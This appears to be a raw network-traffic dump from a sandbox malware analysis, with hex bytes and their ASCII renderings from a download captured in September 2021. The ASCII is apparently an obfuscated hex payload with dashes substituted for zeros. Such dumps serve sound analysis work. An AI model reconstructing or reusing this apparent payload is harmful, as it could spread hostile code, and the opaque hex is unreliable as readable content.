                            2021-09-14 19:32:54 UTC15INData Raw: 32 2d 2d 2d 2d 2d 2d 2d 41 2d 2d 2d 2d 31 31 2d 32 31 43 31 42 32 44 2d 41 32 36 38 43 2d 38 2d 2d 2d 2d 31 42 32 44 2d 42 32 42 2d 33 32 36 32 42 46 34 32 38 2d 34 2d 2d 2d 2d 32 42 32 41 2d 32 31 36 31 35 32 44 2d 32 32 36 32 41 32 36 32 42 46 43 2d 2d 2d 2d 31 33 33 2d 2d 34 2d 2d 32 2d 2d 2d 2d 2d 2d 2d 2d 41 2d 2d 2d 2d 31 31 2d 33 31 44 31 44 32 44 31 35 32 36 31 32 2d 2d 46 45 31 35 2d 38 2d 2d 2d 2d 31 42 2d 36 31 41 31 36 32 43 2d 41 32 36 38 31 2d 38 2d 2d 2d 2d 31 42 32 41 32 36 32 42 45 39 32 36 32 42 46 34 31 33 33 2d 2d 31 2d 2d 35 35 2d 2d 2d 2d 2d 2d 2d 46 2d 2d 2d 2d 31 31 2d 46 2d 2d 37 42 38 33 2d 2d 2d 2d 2d 34 34 35 2d 34 2d 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 2d 2d 2d 31 2d 2d 2d 2d 2d 2d 2d 31 45 2d 2d 2d 2d 2d 2d 32 43 2d 2d 2d 2d 2d 2d
                            Data Ascii: 2-------A----11-21C1B2D-A268C-8----1B2D-B2B-3262BF428-4----2B2A-216152D-2262A262BFC----133--4--2--------A----11-31D1D2D152612--FE15-8----1B-61A162C-A2681-8----1B2A262BE9262BF4133--1--55-------F----11-F--7B83-----445-4-------2------1-------1E------2C------
                            2021-09-14 19:32:54 UTC19INData Raw: 2d 2d 34 2d 33 31 37 31 35 32 44 2d 42 32 36 2d 34 36 46 36 42 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 42 32 36 32 42 46 33 2d 2d 2d 2d 2d 2d 2d 33 33 2d 2d 41 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 43 31 45 32 44 2d 41 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 32 44 2d 36 32 42 2d 33 32 36 32 42 46 34 32 41 2d 32 31 41 31 35 32 44 31 32 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 2d 33 31 36 31 38 32 44 2d 41 32 36 36 46 36 43 2d 2d 2d 2d 2d 41 32 41 32 36 32 42 45 43 32 36 32 42 46 34 2d 33 33 2d 2d 41 2d 2d 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 37 31 45 32 44 2d 41 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 32 44 2d 36 32 42 2d 33 32 36 32 42 46 34 32 41 2d 32 31 36 31 35 32 44 31 32 32 36 37 42 31 39 2d 2d 2d 2d 2d 34 2d 33 31 43
                            Data Ascii: --4-317152D-B26-46F6B-----A2A262BEB262BF3-------33--A--3----------------21C1E2D-A267B19-----42D-62B-3262BF42A-21A152D12267B19-----4-316182D-A266F6C-----A2A262BEC262BF4-33--A--3----------------2171E2D-A267B19-----42D-62B-3262BF42A-216152D12267B19-----4-31C
                            2021-09-14 19:32:54 UTC25INData Raw: 42 2d 2d 2d 2d 2d 41 38 2d 33 32 2d 2d 2d 2d 2d 34 32 38 41 36 2d 2d 2d 2d 2d 41 32 38 41 37 2d 2d 2d 2d 2d 41 32 38 36 42 2d 2d 2d 2d 2d 36 32 44 31 43 32 42 31 35 38 2d 34 41 2d 2d 2d 2d 2d 34 32 42 43 41 38 2d 32 41 2d 2d 2d 2d 2d 34 32 42 43 43 38 2d 32 43 2d 2d 2d 2d 2d 34 32 42 43 45 32 38 36 46 2d 2d 2d 2d 2d 36 32 38 37 32 2d 2d 2d 2d 2d 36 32 38 37 33 2d 2d 2d 2d 2d 36 32 38 37 34 2d 2d 2d 2d 2d 36 32 38 36 2d 2d 2d 2d 2d 2d 36 32 38 36 39 2d 2d 2d 2d 2d 36 32 38 36 41 2d 2d 2d 2d 2d 36 32 38 36 31 2d 2d 2d 2d 2d 36 32 38 37 37 2d 2d 2d 2d 2d 36 32 38 37 41 2d 2d 2d 2d 2d 36 32 38 37 35 2d 2d 2d 2d 2d 36 32 38 37 36 2d 2d 2d 2d 2d 36 32 38 37 38 2d 2d 2d 2d 2d 36 32 38 37 39 2d 2d 2d 2d 2d 36 32 38 37 42 2d 2d 2d 2d 2d 36 32 38 37 43 2d 2d 2d 2d
                            Data Ascii: B-----A8-32-----428A6-----A28A7-----A286B-----62D1C2B158-4A-----42BCA8-2A-----42BCC8-2C-----42BCE286F-----62872-----62873-----62874-----6286------62869-----6286A-----62861-----62877-----6287A-----62875-----62876-----62878-----62879-----6287B-----6287C----
                            2021-09-14 19:32:54 UTC26INData Raw: 2d 2d 2d 2d 36 32 42 2d 33 2d 41 32 42 44 34 31 32 2d 31 32 38 39 38 2d 2d 2d 2d 2d 41 32 44 43 2d 44 45 2d 45 31 32 2d 31 46 45 31 36 31 32 2d 2d 2d 2d 31 42 36 46 36 33 2d 2d 2d 2d 2d 41 44 43 32 41 2d 41 2d 31 31 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 46 2d 2d 35 35 36 34 2d 2d 2d 45 2d 2d 2d 2d 2d 2d 2d 2d 31 42 33 2d 2d 33 2d 2d 32 41 2d 31 2d 2d 2d 2d 32 38 2d 2d 2d 2d 31 31 37 45 37 44 2d 2d 2d 2d 2d 34 32 2d 36 32 32 2d 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 41 38 2d 2d 2d 2d 2d 41 31 44 32 44 2d 42 32 36 2d 36 32 38 41 45 2d 2d 2d 2d 2d 41 32 44 2d 36 32 42 2d 33 2d 41 32 42 46 33 32 41 2d 36 32 38 41 46 2d 2d 2d 2d 2d 41 31 37 32 44 31 33 32 36 2d 37 32 38 32 42 2d 31 2d 2d 2d 36 31 38 32 44 2d 43 32 36 2d 38 31 33 2d 39 31 36 31 33 2d 38 32 42
                            Data Ascii: ----62B-3-A2BD412-12898-----A2DC-DE-E12-1FE1612----1B6F63-----ADC2A-A-11------2---F--5564---E--------1B3--3--2A-1----28----117E7D-----42-622-D-1E28FF-----628A8-----A1D2D-B26-628AE-----A2D-62B-3-A2BF32A-628AF-----A172D1326-7282B-1---6182D-C26-813-91613-82B
                            2021-09-14 19:32:54 UTC33INData Raw: 2d 2d 2d 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 35 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 38 33 43 2d 31 2d 2d 2d 36 32 44 2d 31 32 41 32 38 35 37 2d 31 2d 2d 2d 36 31 38 32 44 2d 32 32 36 32 41 32 36 32 42 46 43 2d 2d 2d 2d 2d 2d 33 45 32 38 33 44 2d 31 2d 2d 2d 36 32 44 2d 31 32 41 31 37 32 38 38 36 2d 2d 2d 2d 2d 36 32 41 31 33 33 2d 2d 34 2d 2d 32 46 2d 31 2d 2d 2d 2d 33 37 2d 2d 2d 2d 31 31 32 38 33 39 2d 31 2d 2d 2d 36 33 39 32 34 2d 31 2d 2d 2d 2d 37 45 37 43 2d 2d 2d 2d 2d 34 32 44 2d 31 32 41 37 45 37 42 2d 2d 2d 2d 2d 34 32 44 2d 37 37 45 33 31 2d 2d 2d 2d 2d 34 32 42 2d 35 37 45 33 2d 2d 2d 2d 2d 2d 34 31 41 32 44 2d 44 32 36 37 45 37 42 2d 2d 2d 2d 2d 34 33 39 41 42 2d 2d 2d 2d 2d 2d 32 42 2d 33 2d 41 32 42 46 31 32 38 33 41 2d 31 2d 2d 2d 36
                            Data Ascii: ------33--9--15--------------283C-1---62D-12A2857-1---6182D-2262A262BFC------3E283D-1---62D-12A172886-----62A133--4--2F-1----37----112839-1---63924-1----7E7C-----42D-12A7E7B-----42D-77E31-----42B-57E3------41A2D-D267E7B-----439AB------2B-3-A2BF1283A-1---6
                            2021-09-14 19:32:54 UTC40INData Raw: 46 31 39 2d 31 2d 2d 2d 41 31 37 32 44 32 43 32 36 37 45 37 45 2d 2d 2d 2d 2d 34 2d 37 32 2d 39 31 32 36 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 45 39 2d 2d 2d 2d 2d 41 32 38 41 38 2d 2d 2d 2d 2d 41 31 38 32 44 31 31 32 36 2d 36 32 38 41 45 2d 2d 2d 2d 2d 41 32 43 2d 44 32 42 2d 39 2d 43 32 42 41 44 2d 42 32 42 44 32 2d 41 32 42 45 44 44 45 33 2d 37 45 37 45 2d 2d 2d 2d 2d 34 32 38 46 35 2d 2d 2d 2d 2d 41 32 36 2d 36 31 37 38 44 37 32 2d 2d 2d 2d 2d 31 2d 44 2d 39 31 36 2d 38 41 32 2d 39 32 38 32 41 2d 31 2d 2d 2d 36 32 38 42 38 2d 2d 2d 2d 2d 41 44 45 2d 43 32 38 34 43 2d 2d 2d 2d 2d 41 32 38 36 31 2d 2d 2d 2d 2d 41 44 45 2d 2d 32 41 2d 33 2d 43 2d 31 31 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 39 38 39 2d 2d 2d 43 34 36 2d 2d 2d 2d 2d 31 31 33
                            Data Ascii: F19-1---A172D2C267E7E-----4-72-9126D-1E28FF-----628E9-----A28A8-----A182D1126-628AE-----A2C-D2B-9-C2BAD-B2BD2-A2BEDDE3-7E7E-----428F5-----A26-6178D72-----1-D-916-8A2-9282A-1---628B8-----ADE-C284C-----A2861-----ADE--2A-3-C-11-------------8989---C46-----113
                            2021-09-14 19:32:54 UTC47INData Raw: 33 2d 31 2d 2d 2d 41 38 2d 33 45 2d 2d 2d 2d 2d 34 32 41 2d 2d 31 33 33 2d 2d 36 2d 2d 31 41 2d 2d 2d 2d 2d 2d 35 36 2d 2d 2d 2d 31 31 2d 33 2d 34 2d 35 2d 37 2d 45 2d 34 32 38 32 43 2d 31 2d 2d 2d 36 31 35 32 44 2d 39 32 36 2d 32 2d 36 36 46 41 31 2d 31 2d 2d 2d 36 32 41 2d 41 32 42 46 35 2d 2d 2d 2d 31 33 33 2d 2d 36 2d 2d 31 42 2d 2d 2d 2d 2d 2d 35 37 2d 2d 2d 2d 31 31 2d 33 2d 34 2d 35 2d 45 2d 34 2d 45 2d 35 32 38 32 43 2d 31 2d 2d 2d 36 31 39 32 44 2d 39 32 36 2d 32 2d 36 36 46 41 31 2d 31 2d 2d 2d 36 32 41 2d 41 32 42 46 35 2d 2d 31 33 33 2d 2d 36 2d 2d 33 37 2d 2d 2d 2d 2d 2d 31 37 2d 2d 2d 2d 31 31 31 34 31 37 32 44 31 2d 32 36 37 45 33 39 2d 2d 2d 2d 2d 34 2d 32 36 46 37 32 2d 2d 2d 2d 2d 41 32 43 32 34 32 42 2d 33 2d 41 32 42 45 45 37 45 33 39
                            Data Ascii: 3-1---A8-3E-----42A--133--6--1A------56----11-3-4-5-7-E-4282C-1---6152D-926-2-66FA1-1---62A-A2BF5----133--6--1B------57----11-3-4-5-E-4-E-5282C-1---6192D-926-2-66FA1-1---62A-A2BF5--133--6--37------17----1114172D1-267E39-----4-26F72-----A2C242B-3-A2BEE7E39
                            2021-09-14 19:32:54 UTC55INData Raw: 2d 2d 2d 2d 36 32 38 46 36 2d 2d 2d 2d 2d 36 32 38 46 2d 2d 2d 2d 2d 2d 36 32 38 45 46 2d 2d 2d 2d 2d 36 36 31 32 38 45 45 2d 2d 2d 2d 2d 36 32 41 2d 2d 2d 2d 2d 33 33 2d 2d 41 2d 2d 32 33 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 38 31 38 32 44 31 38 32 36 2d 33 31 35 31 45 32 44 31 35 32 36 32 2d 34 41 44 38 44 39 35 33 36 36 36 36 36 35 36 35 36 36 36 36 36 35 36 36 36 35 35 39 36 31 32 41 32 36 32 42 45 36 32 36 32 42 45 39 2d 2d 2d 33 33 2d 2d 41 2d 2d 33 32 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 31 43 31 37 32 44 32 37 32 36 32 2d 38 44 46 43 42 33 34 45 36 36 36 35 36 36 36 35 36 36 36 36 36 35 36 35 36 36 35 39 2d 33 31 37 31 43 32 44 31 35 32 36 32 2d 45 46 44 37 46 35 43 31 36 36 36 36 36 35 36 35 36 36 36 36 36 35 36 36 36 35
                            Data Ascii: ----628F6-----628F------628EF-----66128EE-----62A-----33--A--23---------------218182D1826-3151E2D15262-4AD8D95366666565666665666559612A262BE6262BE9---33--A--32---------------21C172D27262-8DFCB34E66656665666665656659-3171C2D15262-EFD7F5C1666665656666656665
                            2021-09-14 19:32:54 UTC62INData Raw: 32 37 42 36 33 2d 2d 2d 2d 2d 34 2d 36 2d 33 2d 36 35 39 36 46 35 43 2d 31 2d 2d 2d 41 2d 42 2d 37 32 44 2d 36 2d 32 32 38 2d 34 2d 31 2d 2d 2d 36 2d 36 2d 37 35 38 2d 41 2d 36 2d 33 33 32 44 39 32 41 2d 2d 31 33 33 2d 2d 33 2d 2d 33 35 2d 2d 2d 2d 2d 2d 36 46 2d 2d 2d 2d 31 31 2d 32 37 42 36 32 2d 2d 2d 2d 2d 34 31 41 32 44 2d 44 32 36 2d 32 31 34 31 36 32 43 2d 41 32 36 32 36 2d 36 32 43 31 32 32 42 2d 41 2d 41 32 42 46 31 37 44 36 32 2d 2d 2d 2d 2d 34 32 42 46 31 2d 36 36 46 37 39 2d 2d 2d 2d 2d 41 2d 32 31 34 31 44 32 44 2d 33 32 36 32 36 32 41 37 44 36 33 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 2d 2d 2d 31 33 33 2d 2d 36 2d 2d 36 35 2d 2d 2d 2d 2d 2d 37 2d 2d 2d 2d 2d 31 31 2d 33 31 36 32 46 2d 36 37 33 35 44 2d 31 2d 2d 2d 41 37 41 2d 33 38 44 32 32
                            Data Ascii: 27B63-----4-6-3-6596F5C-1---A-B-72D-6-228-4-1---6-6-758-A-6-332D92A--133--3--35------6F----11-27B62-----41A2D-D26-214162C-A2626-62C122B-A-A2BF17D62-----42BF1-66F79-----A-2141D2D-326262A7D63-----42BF8------133--6--65------7-----11-3162F-6735D-1---A7A-38D22
                            2021-09-14 19:32:54 UTC69INData Raw: 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 44 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 44 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 45 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 45 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 42 43 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 2d 46 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 33 32 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 31 2d 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 31 46 2d 2d 2d 2d 31 42 32 38 34 36 2d 2d 2d 2d 2d 41 31 46 31 31 36 46 36 44 2d 31 2d 2d 2d 41 37 45 37 36 2d 2d 2d 2d 2d 34 44 2d 34 38 2d 2d 2d 2d 2d 31 32 38 34 36 2d 2d
                            Data Ascii: F6D-1---A7E76-----4D-BD-----12846-----A1F-D6F6D-1---A7E76-----4D-BE-----12846-----A1F-E6F6D-1---A7E76-----4D-BC-----12846-----A1F-F6F6D-1---A7E76-----4D-32-----12846-----A1F1-6F6D-1---A7E76-----4D-1F----1B2846-----A1F116F6D-1---A7E76-----4D-48-----12846--
                            2021-09-14 19:32:54 UTC76INData Raw: 33 2d 37 2d 33 37 42 31 35 2d 2d 2d 2d 2d 34 31 31 2d 37 32 2d 39 39 32 43 44 2d 31 45 32 38 46 46 2d 2d 2d 2d 2d 36 32 38 42 33 2d 2d 2d 2d 2d 36 32 38 36 31 2d 2d 2d 2d 2d 41 44 45 2d 2d 32 41 36 46 39 37 34 31 31 43 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 42 2d 32 2d 2d 2d 2d 33 42 2d 32 2d 2d 2d 2d 32 36 2d 2d 2d 2d 2d 2d 34 36 2d 2d 2d 2d 2d 31 31 33 33 2d 2d 34 2d 2d 35 33 2d 2d 2d 2d 2d 2d 38 2d 2d 2d 2d 2d 31 31 31 36 37 45 33 41 2d 2d 2d 2d 2d 34 36 46 41 44 2d 31 2d 2d 2d 41 31 37 35 39 31 39 32 44 2d 37 32 36 31 41 32 44 2d 36 32 36 32 42 33 36 2d 43 32 42 46 37 2d 42 32 42 46 38 37 45 33 41 2d 2d 2d 2d 2d 34 2d 37 36 46 41 45 2d 31 2d 2d 2d 41 37 42 31 31 2d 2d 2d 2d 2d 34 2d 32 32 38 36 2d 2d 31 2d 2d 2d 41 32 43 2d 43
                            Data Ascii: 3-7-37B15-----411-72-992CD-1E28FF-----628B3-----62861-----ADE--2A6F97411C--------------------3B-2----3B-2----26------46-----1133--4--53------8-----11167E3A-----46FAD-1---A1759192D-7261A2D-6262B36-C2BF7-B2BF87E3A-----4-76FAE-1---A7B11-----4-2286--1---A2C-C
                            2021-09-14 19:32:54 UTC84INData Raw: 34 33 46 2d 2d 2d 2d 2d 32 31 43 32 44 2d 33 32 36 32 36 32 41 37 44 39 35 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 35 2d 2d 2d 2d 2d 34 2d 33 32 38 38 36 2d 2d 2d 2d 2d 41 37 34 33 46 2d 2d 2d 2d 2d 32 31 41 32 44 2d 33 32 36 32 36 32 41 37 44 39 35 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 36 2d 2d 2d 2d 2d 34 2d 33 32 38 38 35 2d 2d 2d 2d 2d 41 37 34 33 43 2d 2d 2d 2d 2d 32 31 43 32 44 2d 33 32 36 32 36 32 41 37 44 39 36 2d 2d 2d 2d 2d 34 32 42 46 38 2d 2d 2d 33 33 2d 2d 39 2d 2d 31 46 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 32 2d 32 37 42 39 36 2d 2d 2d 2d 2d 34 2d 33 32 38
                            Data Ascii: 43F-----21C2D-326262A7D95-----42BF8---33--9--1F---------------2-27B95-----4-32886-----A743F-----21A2D-326262A7D95-----42BF8---33--9--1F---------------2-27B96-----4-32885-----A743C-----21C2D-326262A7D96-----42BF8---33--9--1F---------------2-27B96-----4-328
                            2021-09-14 19:32:54 UTC91INData Raw: 45 2d 31 2d 2d 2d 41 2d 32 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 36 35 38 31 39 32 44 31 37 32 36 32 36 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 32 37 42 42 34 2d 2d 2d 2d 2d 34 38 45 42 37 33 33 35 41 32 42 2d 41 2d 41 32 42 43 39 37 44 42 31 2d 2d 2d 2d 2d 34 32 42 45 34 2d 32 37 42 39 37 2d 2d 2d 2d 2d 34 31 37 32 44 2d 36 32 36 2d 39 32 43 31 32 32 42 2d 33 2d 44 32 42 46 38 2d 39 2d 32 2d 32 37 42 42 34 2d 2d 2d 2d 2d 34 36 46 41 44 2d 31 2d 2d 2d 36 2d 32 31 36 31 41 32 44 31 45 32 36 32 36 2d 32 37 43 42 34 2d 2d 2d 2d 2d 34 31 36 32 38 2d 36 2d 2d 2d 2d 32 42 2d 32 37 42 42 31 2d 2d 2d 2d 2d 34 2d 32 37 42 41 2d 2d 2d 2d 2d 2d 34 33 32 2d 45 32 42 2d 37 37 44 42 38 2d 2d 2d 2d 2d 34 32 42 44 44 32 38 45 37 2d 31 2d 2d 2d 41 2d 36 2d 35 2d 34 35 39
                            Data Ascii: E-1---A-2-27BB1-----4-658192D172626-27BB1-----4-27BB4-----48EB7335A2B-A-A2BC97DB1-----42BE4-27B97-----4172D-626-92C122B-3-D2BF8-9-2-27BB4-----46FAD-1---6-2161A2D1E2626-27CB4-----41628-6----2B-27BB1-----4-27BA------432-E2B-77DB8-----42BDD28E7-1---A-6-5-459
                            2021-09-14 19:32:54 UTC98INData Raw: 42 35 34 42 43 43 41 43 35 31 33 37 41 44 42 44 45 38 37 44 44 35 42 36 31 39 37 36 34 38 41 43 34 37 42 34 38 36 35 38 31 34 42 42 46 41 33 32 2d 38 44 31 33 41 41 44 35 43 37 31 45 37 2d 46 41 42 36 46 36 33 32 43 45 33 43 31 38 37 46 45 45 45 43 39 35 34 42 42 46 41 33 45 39 44 45 36 35 2d 35 45 38 34 42 42 46 41 33 37 36 34 37 34 45 38 42 32 43 43 31 42 39 46 35 34 42 42 46 41 33 46 46 44 43 36 34 41 34 43 39 39 37 35 41 43 36 45 39 45 46 42 31 43 44 38 33 33 43 39 46 43 42 36 37 35 42 44 31 38 37 45 37 44 46 34 42 42 46 41 33 43 42 43 43 31 46 39 39 33 45 42 45 36 37 42 39 37 2d 46 43 37 37 39 38 31 2d 32 44 41 31 41 37 31 39 33 44 38 2d 31 37 41 37 39 2d 38 36 34 35 45 36 46 43 32 37 34 42 42 46 41 33 37 42 41 42 35 2d 34 46 44 2d 2d 35 39 42 43 38
                            Data Ascii: B54BCCAC5137ADBDE87DD5B6197648AC47B4865814BBFA32-8D13AAD5C71E7-FAB6F632CE3C187FEEEC954BBFA3E9DE65-5E84BBFA376474E8B2CC1B9F54BBFA3FFDC64A4C9975AC6E9EFB1CD833C9FCB675BD187E7DF4BBFA3CBCC1F993EBE67B97-FC77981-2DA1A7193D8-17A79-8645E6FC274BBFA37BAB5-4FD--59BC8
                            2021-09-14 19:32:54 UTC105INData Raw: 36 2d 36 2d 2d 31 31 2d 37 34 44 2d 36 2d 36 2d 2d 31 38 2d 37 34 44 2d 36 2d 36 2d 2d 32 35 2d 37 34 44 2d 36 2d 36 2d 2d 33 2d 2d 37 35 39 2d 2d 2d 36 2d 2d 33 35 2d 37 35 39 2d 2d 31 32 2d 2d 34 37 2d 37 34 42 2d 37 31 32 2d 2d 35 36 2d 37 34 42 2d 37 31 32 2d 2d 35 46 2d 37 34 42 2d 37 31 32 2d 2d 36 39 2d 37 34 42 2d 37 31 32 2d 2d 37 34 2d 37 34 42 2d 37 31 32 2d 2d 38 2d 2d 37 38 45 2d 37 31 32 2d 2d 41 31 2d 37 38 45 2d 37 31 32 2d 2d 41 45 2d 37 38 45 2d 37 31 32 2d 2d 42 42 2d 37 38 45 2d 37 31 32 2d 2d 43 32 2d 37 38 45 2d 37 31 32 2d 2d 44 37 2d 37 38 45 2d 37 31 32 2d 2d 45 43 2d 37 38 45 2d 37 31 32 2d 2d 46 38 2d 37 38 45 2d 37 31 32 2d 2d 2d 38 2d 38 38 45 2d 37 2d 36 2d 2d 31 33 2d 38 35 39 2d 2d 2d 36 2d 2d 31 41 2d 38 35 39 2d 2d 2d 36
                            Data Ascii: 6-6--11-74D-6-6--18-74D-6-6--25-74D-6-6--3--759---6--35-759--12--47-74B-712--56-74B-712--5F-74B-712--69-74B-712--74-74B-712--8--78E-712--A1-78E-712--AE-78E-712--BB-78E-712--C2-78E-712--D7-78E-712--EC-78E-712--F8-78E-712---8-88E-7-6--13-859---6--1A-859---6
                            2021-09-14 19:32:54 UTC113INData Raw: 2d 35 37 32 36 33 32 2d 31 32 35 2d 2d 46 38 32 44 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 2d 2d 41 42 32 36 36 37 2d 2d 32 37 2d 2d 32 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 2d 2d 44 42 32 36 36 37 2d 2d 32 37 2d 2d 36 2d 32 45 2d 2d 2d 2d 2d 2d 2d 2d 2d 36 31 38 46 33 31 41 44 45 2d 2d 32 37 2d 2d 38 34 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 42 34 33 32 37 33 39 2d 31 32 38 2d 2d 39 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 35 31 32 37 2d 35 2d 31 32 38 2d 2d 44 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 37 37 32 37 33 44 2d 31 32 39 2d 2d 46 43 32 45 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 39 45 32 37 36 37 2d 2d 32 41 2d 2d 2d 38 32 46 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 41 39 32 37 34 32 2d 31 32 41 2d 2d 38 43 32 46 2d 2d 2d 2d 2d 2d 2d 2d 36 36 2d 33 2d 41
                            Data Ascii: -572632-125--F82D---------6--AB2667--27--2C2E---------6--DB2667--27--6-2E---------618F31ADE--27--842E--------66-B432739-128--9C2E--------66-35127-5-128--DC2E--------66-377273D-129--FC2E--------66-39E2767--2A---82F--------66-3A92742-12A--8C2F--------66-3-A
                            2021-09-14 19:32:54 UTC120INData Raw: 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 42 31 37 41 33 43 2d 32 33 31 2d 31 36 34 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 46 35 37 41 33 43 2d 32 33 31 2d 31 39 2d 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 33 39 37 42 33 43 2d 32 33 31 2d 31 42 43 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 37 44 37 42 46 39 2d 33 33 31 2d 31 45 38 41 33 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 41 44 37 42 46 39 2d 33 33 31 2d 31 31 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 44 44 37 42 46 39 2d 33 33 31 2d 31 34 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 2d 44 37 43 46 39 2d 33 33 31 2d 31 37 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 35 31 37 43 46 39 2d 33 33 31 2d 31 41 38 41 34 2d 2d 2d 2d 2d 2d 2d 2d 31 36 2d 2d 39 35 37 43 46 39 2d 33 33 31 2d 31 44 38 41 34 2d 2d
                            Data Ascii: 3--------16--B17A3C-231-164A3--------16--F57A3C-231-19-A3--------16--397B3C-231-1BCA3--------16--7D7BF9-331-1E8A3--------16--AD7BF9-331-118A4--------16--DD7BF9-331-148A4--------16---D7CF9-331-178A4--------16--517CF9-331-1A8A4--------16--957CF9-331-1D8A4--
                            2021-09-14 19:32:54 UTC127INData Raw: 2d 2d 44 36 46 2d 2d 2d 2d 2d 31 2d 2d 35 39 36 46 2d 2d 2d 2d 2d 31 2d 2d 34 44 37 2d 2d 2d 2d 2d 2d 31 2d 2d 38 35 37 2d 2d 2d 2d 2d 2d 31 2d 2d 41 31 37 2d 2d 2d 2d 2d 2d 32 2d 2d 42 44 37 2d 2d 2d 2d 2d 2d 31 2d 2d 44 39 37 2d 2d 2d 2d 2d 2d 32 2d 2d 2d 39 37 31 2d 2d 2d 2d 2d 31 2d 2d 33 39 37 31 2d 2d 2d 2d 2d 31 2d 2d 38 35 37 31 2d 2d 2d 2d 2d 31 2d 2d 41 31 37 31 2d 2d 2d 2d 2d 32 2d 2d 42 44 37 31 2d 2d 2d 2d 2d 31 2d 2d 46 35 37 31 2d 2d 2d 2d 2d 32 2d 2d 31 31 37 32 2d 2d 2d 2d 2d 31 2d 2d 2d 31 35 38 2d 2d 2d 2d 2d 31 2d 2d 34 39 37 32 2d 2d 2d 2d 2d 31 2d 2d 36 35 37 32 2d 2d 2d 2d 2d 32 2d 2d 38 31 37 32 2d 2d 2d 2d 2d 31 2d 2d 43 39 37 33 2d 2d 2d 2d 2d 31 2d 2d 2d 31 37 34 2d 2d 2d 2d 2d 31 2d 2d 34 44 37 34 2d 2d 2d 2d 2d 31 2d 2d 38 35
                            Data Ascii: --D6F-----1--596F-----1--4D7------1--857------1--A17------2--BD7------1--D97------2---971-----1--3971-----1--8571-----1--A171-----2--BD71-----1--F571-----2--1172-----1---158-----1--4972-----1--6572-----2--8172-----1--C973-----1---174-----1--4D74-----1--85
                            2021-09-14 19:32:54 UTC134INData Raw: 2d 44 38 41 39 33 41 2d 41 36 43 2d 2d 39 44 41 39 39 43 2d 2d 36 43 2d 2d 39 37 41 41 33 2d 2d 46 31 39 2d 36 46 33 31 41 32 45 31 33 34 39 2d 2d 46 33 31 41 36 37 2d 2d 46 39 2d 35 46 33 31 41 43 43 31 32 37 31 2d 35 46 33 31 41 39 38 2d 31 37 31 2d 35 45 38 31 43 41 36 2d 2d 32 31 2d 35 46 33 31 41 42 41 31 33 41 31 2d 34 46 33 31 41 43 34 31 33 44 39 2d 34 46 35 42 31 44 35 31 33 44 31 2d 34 2d 41 42 32 44 42 31 33 42 39 2d 34 46 33 31 41 46 35 31 33 41 39 2d 34 31 34 42 32 39 43 2d 2d 41 39 2d 34 32 35 42 32 46 43 31 33 44 31 2d 34 46 33 31 41 46 43 31 33 44 39 2d 34 46 33 31 41 2d 33 31 34 43 39 2d 34 31 34 42 32 39 43 2d 2d 43 39 2d 34 32 35 42 32 46 43 31 33 35 39 2d 35 37 46 41 39 35 36 2d 34 37 31 2d 35 46 33 31 41 36 37 2d 2d 37 31 